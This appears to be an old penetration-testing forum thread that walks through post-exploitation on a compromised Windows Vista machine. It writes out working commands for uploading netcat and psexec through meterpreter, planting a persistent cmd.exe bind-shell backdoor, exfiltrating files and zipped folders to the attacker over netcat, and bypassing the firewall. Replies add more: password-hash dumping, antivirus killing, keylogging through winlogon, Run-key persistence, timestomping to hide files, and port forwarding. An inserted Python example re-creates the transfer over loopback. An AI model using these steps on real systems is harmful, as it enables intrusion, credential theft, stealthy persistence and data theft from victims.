This 'Howto' is written to explain post-exploitation file transfers from a Vista box to a BT3 box.
This process doesn't work if the Windows firewall is on. Somebody has to research and find a way to turn it off during the meterpreter session.
I'm assuming that:
1) You are testing this with your own machines or you have permission to penetrate the Vista box.
2) You've already got a meterpreter session running. If not, maybe this one can help: http://forums.remote-exploit.org/showthread.php?t=19129
3) You've downloaded nc (netcat) for Windows. If not, download: http://joncraton.org/media/files/nc111nt.zip
4) You've downloaded psexec.exe to execute processes remotely. If not, download: http://download.sysinternals.com/Files/PsTools.zip
Now we've got our tools. Let's start with uploading the required files. They can be uploaded to the root folder, or you can make a new folder with the mkdir command. Say we'd like to upload our files into the c:\xxx folder of the victim (Vista) box. So, go to the C drive and prepare the folder:
Code:
cd c:\
mkdir xxx
ls
cd xxx
The ls will show you that the folder has been created.
Open the root directory of the BT3 box and unzip the nc111nt.zip & PsTools.zip files.
Uploading the files
We just need 2 files. Upload them:
Code:
upload /root/nc111nt/nc.exe nc.exe
upload /root/PsTools/psexec.exe psexec.exe
ls
The ls will show you that the files have been uploaded.
Opening the backdoor
Open a command shell by entering this at the meterpreter prompt:
Code:
execute -f cmd.exe -c -H -i
Run nc & keep it running (that's our backdoor) to keep port 8888 open:
Code:
psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888
Here, username & password are the admin username & password of the Vista box. You should already know these (coz you own the box, don't you?). In the real world it's possible to crack these, but that is not covered in this tut.
Using backdoor to transfer file
OK... now that we've got our door, you can press Ctrl+C to terminate the command shell & then type exit to close the meterpreter session. Open a fresh konsole & use telnet to connect to the victim anytime:
Code:
telnet 192.168.x.x 8888
Here 192.168.x.x is the victim's IP address. In my case, it's 192.168.1.2.
You should see this (we will call it the "Shell"):
Code:
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Files can be transferred from any location on the Vista box to any location on the BT3 box as long as the correct file path is provided.
To receive the xxxx.txt file into the yyyy directory under root on the BT3 box, first prepare the BT3 box. Open another konsole & enter:
Code:
nc -vv -l -p 10000 > /root/yyyy/xxxx.txt
Now, to send the file from the zzzz folder on the C drive of the Vista box, go to the "Shell" & enter:
Code:
nc 192.168.y.y 10000 < C:\zzzz\xxxx.txt
Here, 192.168.y.y is the BT3 box (attacker) IP address.
The file should be downloaded to the desired folder.
ENJOY!!!!!!!!!!
Reference:
http://linux.byexamples.com/archives...e-with-netcat/
http://forums.remote-exploit.org/showthread.php?t=20858
Thanks, very good tutorial.
I usually use the TFTP server to download or upload files on the victim machine.
I wanna know how to download not only a file but a whole directory from a victim machine using netcat or the TFTP server.
If it is possible, please tell me how.
Well, there may be other ways, but I like to do it as follows:
- Download PKZIP 2.04 (93.02.01) PKZIP.EXE (42 KB) from http://www.uv.tietgen.dk/staff/mlha/Download/dos/
- Upload it to the xxx folder on the victim box:
Code:
upload /root/pkzip.exe pkzip.exe
- Then, if your purpose is to download the "test" folder from the victim box, compress it to make a zip file:
Code:
pkzip.exe test.zip c:\test\*.*
- Then just follow the file transfer procedure to download it to the BT box.
Hope that it's clear....
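Added example (not from the thread, and not kazalku's code): the two-ended netcat transfer from the tutorial (`nc -vv -l -p 10000 > file` on BT3, `nc 192.168.y.y 10000 < file` in the victim shell) together with the "zip the folder first" answer, reproduced with raw sockets so it runs on one machine over loopback. The point it shows is that the listener has no idea how big the file is; it only stops when the sender closes the connection, so a dropped connection looks like a finished transfer, and you want to compare a hash afterwards. The folder contents, file names and the loopback port (chosen by the OS) are all constructed for the example.

```python
# Added example, not code from the thread: netcat-style raw TCP file transfer
# plus "zip the directory first", run over loopback with constructed sample data.
import hashlib
import io
import os
import socket
import tempfile
import threading
import zipfile


def zip_directory(root):
    """Like `pkzip.exe test.zip c:\\test\\*.*`, but recursive: return the zip as bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for dirpath, _dirs, files in os.walk(root):
            for name in sorted(files):
                full = os.path.join(dirpath, name)
                zf.write(full, os.path.relpath(full, root))
    return buf.getvalue()


def receive_until_eof(listener):
    """Receiver side of `nc -l -p PORT > file`: accept one client, read until it closes.

    The stream carries no length and no checksum, so EOF is the only
    end-of-file signal; a dropped connection is indistinguishable from success.
    """
    conn, _peer = listener.accept()
    chunks = []
    with conn:
        while True:
            data = conn.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def send_and_close(host, port, payload):
    """Sender side of `nc HOST PORT < file`: push every byte, then half-close."""
    with socket.create_connection((host, port)) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)  # this is what makes the listener see EOF


def transfer(payload, host="127.0.0.1"):
    """Run both ends over loopback. Returns (received_bytes, digests_match)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((host, 0))  # port 0: let the OS pick a free port (assumption for the demo)
    listener.listen(1)
    port = listener.getsockname()[1]
    box = {}
    t = threading.Thread(target=lambda: box.update(data=receive_until_eof(listener)))
    t.start()
    send_and_close(host, port, payload)
    t.join()
    listener.close()
    received = box["data"]
    # netcat gives no integrity check of its own: compare a digest out of band.
    ok = hashlib.sha256(received).digest() == hashlib.sha256(payload).digest()
    return received, ok


def demo_directory_transfer():
    """Build a constructed sample folder, zip it, 'netcat' it across, unzip it, return the files."""
    src = tempfile.mkdtemp(prefix="victim_")
    dst = tempfile.mkdtemp(prefix="attacker_")
    sample = {  # constructed sample data, not real victim files
        "notes.txt": b"constructed sample file\n",
        os.path.join("sub", "creds.ini"): b"[db]\nuser=test\n",
    }
    for rel, data in sample.items():
        path = os.path.join(src, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    blob = zip_directory(src)
    received, ok = transfer(blob)
    if not ok:
        raise RuntimeError("digest mismatch: transfer truncated or corrupted")
    with zipfile.ZipFile(io.BytesIO(received)) as zf:
        zf.extractall(dst)
    out = {}
    for rel in sample:
        with open(os.path.join(dst, rel), "rb") as fh:
            out[rel] = fh.read()
    return out


if __name__ == "__main__":
    print(demo_directory_transfer())
```

In the real setup, `receive_until_eof` is the `nc -vv -l -p 10000 > /root/yyyy/xxxx.txt` konsole and `send_and_close` is the `nc 192.168.y.y 10000 < C:\zzzz\xxxx.txt` typed in the "Shell"; the digest comparison is the step the thread leaves out, and on the Windows side you would compute it with whatever hashing tool you uploaded alongside nc.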
Very clear, thank you kazalku for this solution.
Let's add some more ingredients to the soup.
In case a Windows firewall is in place, we can do the following to bypass it:
Code:
C:\>netsh firewall set allowedprogram %systemroot%\system32\nc.exe
In this case, nc.exe was placed in the system32 directory. You can also disable the firewall altogether, as well as open particular ports. Try the help menu, which is really good!
Code:
netsh firewall set /?
Enjoy!
I was too lazy to add this........
Cheers mate!
Hi,
just curious: you have already exploited the box with msf3, so just a stupid question, but why not use msf3 to transfer files and use a reverse shell/portfwd to avoid firewall issues (of course, if you don't wanna have an additional backdoor with nc)?
Some nifty other things to do on the (wind0ws) target:
meterpreter > use priv        <<<< needed for timestomp & hashdump
meterpreter > run getgui
meterpreter > run killav
meterpreter > run winenum
meterpreter > hashdump
meterpreter > ps              <<<< get a list of running processes, which can then be used for the migrate command
Using the keylogger function (you have to look for the winlogon.exe process id and migrate your session to this id):
meterpreter > migrate {winlogon.exe process id}
meterpreter > keyscan_start   <<<< now you have to wait for the user to log in and type in something...
meterpreter > keyscan_dump
Manipulating the firewall is also possible with the msf3 built-in reg function:
meterpreter > reg setval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v nc -d "C:\Windows\system32\nc.exe:*:Enabled:nc"
If you don't wanna use psexec, you can also use msf3 to do this:
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 8888 -e cmd.exe"
Changing file times is also not a bad thing to do:
meterpreter > timestomp C:\\windows\\system32\\nc.exe -f C:\\windows\\system32\\cmd.exe
If you don't wanna do the extra step of uploading netcat, just use the msf3 port forwarding:
meterpreter > portfwd -a -L 127.0.0.1 -l 446 -h schaeuble.bnd.de -p 3389
;-))
Great scripts for msf3 can be found here:
hxxp://www[.]darkoperator[.]com/meterpreter/
/brtw2003